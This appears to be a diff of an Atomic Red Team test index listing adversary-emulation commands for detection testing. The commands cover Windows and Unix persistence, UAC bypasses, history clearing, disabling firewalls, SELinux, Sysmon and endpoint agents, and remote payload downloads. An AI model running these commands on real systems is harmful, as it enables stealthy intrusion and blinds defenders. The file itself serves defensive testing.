|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: "vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance. Upon execution, \"T1137 Hello, World VBS!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -2827,9 +2857,11 @@ persistence:
|
|
|
|
|
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
- name: Supicious jse file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
jse files can be placed in and ran from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
|
|
|
|
|
description: "jse files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance.\nUpon execution, \"T1137 Hello, World JSE!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -2846,7 +2878,8 @@ persistence:
|
|
|
|
|
- name: Supicious bat file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
bat files can be placed in and executed from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
|
|
|
|
folder and will also run when the computer is restarted and the user logs in.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -3005,7 +3038,7 @@ persistence:
|
|
|
|
|
description: 'Netsh interacts with other operating system components using dynamic-link
|
|
|
|
|
library (DLL) files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -3017,7 +3050,7 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'netsh.exe add helper #{helper_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1050:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3430,7 +3463,7 @@ persistence:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -3523,7 +3556,7 @@ persistence:
|
|
|
|
|
description: 'Appends a start process cmdlet to the current user''s powershell
|
|
|
|
|
profile pofile that points to a malicious executable
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -3604,7 +3637,7 @@ persistence:
|
|
|
|
|
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
|
|
|
|
|
>> /etc/rc.common
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1164:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3786,11 +3819,11 @@ persistence:
|
|
|
|
|
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
|
|
|
|
|
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
|
|
|
|
/V "Atomic Red Team" /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Reg Key RunOnce
|
|
|
|
|
description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe
|
|
|
|
|
will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will
|
|
|
|
@@ -3807,11 +3840,11 @@ persistence:
|
|
|
|
|
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
|
|
|
|
|
/v 1 /d "#{thing_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
|
|
|
|
|
/v 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Registry RunOnce
|
|
|
|
|
description: |
|
|
|
|
|
RunOnce Key Persistence via PowerShell
|
|
|
|
@@ -3836,7 +3869,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
|
|
|
|
|
-Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1053:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -3941,7 +3974,7 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -3961,10 +3994,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
@@ -3998,10 +4031,10 @@ persistence:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -4021,7 +4054,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1180:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -4084,7 +4117,7 @@ persistence:
|
|
|
|
|
sets it as the screensaver so it will execute for persistence. Requires a
|
|
|
|
|
reboot and logon.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -4425,7 +4458,7 @@ persistence:
|
|
|
|
|
description: 'Make, change owner, and change file attributes on a C source code
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4451,7 +4484,7 @@ persistence:
|
|
|
|
|
- name: Set a SetUID flag on file
|
|
|
|
|
description: 'This test sets the SetUID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4469,11 +4502,11 @@ persistence:
|
|
|
|
|
sudo chmod u+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a SetGID flag on file
|
|
|
|
|
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -4491,7 +4524,7 @@ persistence:
|
|
|
|
|
sudo chmod g+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1023:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -4557,11 +4590,11 @@ persistence:
|
|
|
|
|
command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe
|
|
|
|
|
>> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create shortcut to cmd in startup folders
|
|
|
|
|
description: 'LNK file to launch CMD placed in startup folder
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -4657,10 +4690,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1501:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -4759,7 +4792,7 @@ persistence:
|
|
|
|
|
description: 'This test creates a Systemd service unit file and enables it as
|
|
|
|
|
a service.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -4975,10 +5008,10 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'xcopy #{web_shells} #{web_shell_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{web_shell_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1084:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -5042,11 +5075,10 @@ persistence:
|
|
|
|
|
modified: '2019-10-15T18:43:47.703Z'
|
|
|
|
|
identifier: T1084
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Persistence
|
|
|
|
|
- name: Persistence via WMI Event Subscription
|
|
|
|
|
description: |
|
|
|
|
|
Run from an administrator powershell window
|
|
|
|
|
|
|
|
|
|
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
|
Run from an administrator powershell window. After running, reboot the victim machine.
|
|
|
|
|
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
|
|
|
|
|
|
Code references
|
|
|
|
|
|
|
|
|
@@ -5078,7 +5110,6 @@ persistence:
|
|
|
|
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
|
|
|
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
|
|
|
|
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
|
|
|
|
|
|
|
|
|
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
|
|
|
|
$EventConsumerToCleanup | Remove-WmiObject
|
|
|
|
|
$EventFilterToCleanup | Remove-WmiObject
|
|
|
|
@@ -5161,11 +5192,11 @@ persistence:
|
|
|
|
|
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
|
|
|
|
|
"Shell" "explorer.exe, #{binary_to_execute}" -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
|
|
|
|
|
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Winlogon Userinit Key Persistence - PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
|
|
|
|
@@ -5184,11 +5215,11 @@ persistence:
|
|
|
|
|
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
|
|
|
|
|
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
|
|
|
|
|
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Winlogon Notify Key Logon Persistence - PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
|
|
|
|
@@ -5210,7 +5241,7 @@ persistence:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
|
|
|
|
|
-Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
defense-evasion:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -5373,10 +5404,10 @@ defense-evasion:
|
|
|
|
|
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{local_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bitsadmin Download (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
|
|
@@ -5399,10 +5430,10 @@ defense-evasion:
|
|
|
|
|
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Persist, Download, & Execute
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
|
|
|
|
@@ -5513,7 +5544,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1088:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -5629,7 +5660,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c eventvwr.msc
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Event Viewer (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
|
|
|
@@ -5650,12 +5681,12 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
|
|
|
|
|
-ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper
|
|
|
|
|
description: 'Bypasses User Account Control using the Windows 10 Features on
|
|
|
|
|
Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5672,12 +5703,12 @@ defense-evasion:
|
|
|
|
|
fodhelper.exe
|
|
|
|
|
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using Fodhelper - PowerShell
|
|
|
|
|
description: 'PowerShell code to bypass User Account Control using the Windows
|
|
|
|
|
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5696,7 +5727,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC using ComputerDefaults (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
|
|
|
|
@@ -5719,7 +5750,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
|
|
|
|
|
-Recurse -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bypass UAC by Mocking Trusted Directories
|
|
|
|
|
description: |
|
|
|
|
|
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
|
|
|
|
@@ -5820,7 +5851,7 @@ defense-evasion:
|
|
|
|
|
description: 'Adversaries may supply CMSTP.exe with INF files infected with
|
|
|
|
|
malicious commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5840,12 +5871,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: CMSTP Executing UAC Bypass
|
|
|
|
|
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
|
|
|
|
|
embedding them in the RunPreSetupCommandsSection of an INF file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -5865,7 +5896,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_uac} /au
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1146:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -5918,7 +5949,7 @@ defense-evasion:
|
|
|
|
|
- name: Clear Bash history (rm)
|
|
|
|
|
description: 'Clears bash history via rm
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5926,11 +5957,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (echo)
|
|
|
|
|
description: 'Clears bash history via rm
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5938,11 +5969,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "" > ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (cat dev/null)
|
|
|
|
|
description: 'Clears bash history via cat /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5950,11 +5981,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /dev/null > ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (ln dev/null)
|
|
|
|
|
description: 'Clears bash history via a symlink to /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -5962,23 +5993,23 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'ln -sf /dev/null ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear Bash history (truncate)
|
|
|
|
|
description: 'Clears bash history via truncate
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'truncate -s0 ~/.bash_history
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Clear history of a bunch of shells
|
|
|
|
|
description: 'Clears the history of a bunch of different shell types by setting
|
|
|
|
|
the history size to zero
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -6078,10 +6109,10 @@ defense-evasion:
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
|
|
|
|
|
#{input_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1223:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6169,7 +6200,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{local_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compiled HTML Help Remote Payload
|
|
|
|
|
description: |
|
|
|
|
|
Uses hh.exe to execute a remote compiled HTML Help payload.
|
|
|
|
@@ -6186,7 +6217,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{remote_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1090:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6264,7 +6295,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
unset http_proxy
|
|
|
|
|
unset https_proxy
|
|
|
|
@@ -6394,7 +6425,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'control.exe #{cpl_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1207:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -6652,7 +6683,7 @@ defense-evasion:
|
|
|
|
|
updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl
|
|
|
|
|
dll to be loaded
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -6750,7 +6781,7 @@ defense-evasion:
|
|
|
|
|
description: 'Rename certutil and decode a file. This is in reference to latest
|
|
|
|
|
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -6821,7 +6852,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable iptables firewall
|
|
|
|
|
description: 'Disables the iptables firewall
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6840,7 +6871,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable syslog
|
|
|
|
|
description: 'Disables syslog collection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6857,7 +6888,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable Cb Response
|
|
|
|
|
description: 'Disable the Cb Response service
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -6874,52 +6905,51 @@ defense-evasion:
|
|
|
|
|
- name: Disable SELinux
|
|
|
|
|
description: 'Disables SELinux enforcement
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'setenforce 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Carbon Black Response
|
|
|
|
|
description: 'Disables Carbon Black Response
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable LittleSnitch
|
|
|
|
|
description: 'Disables LittleSnitch
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable OpenDNS Umbrella
|
|
|
|
|
description: 'Disables OpenDNS Umbrella
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Unload Sysmon Filter Driver
|
|
|
|
|
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
|
|
|
|
|
the Sysmon service.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
|
|
|
|
|
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -6928,24 +6958,42 @@ defense-evasion:
|
|
|
|
|
the default)
|
|
|
|
|
type: string
|
|
|
|
|
default: SysmonDrv
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
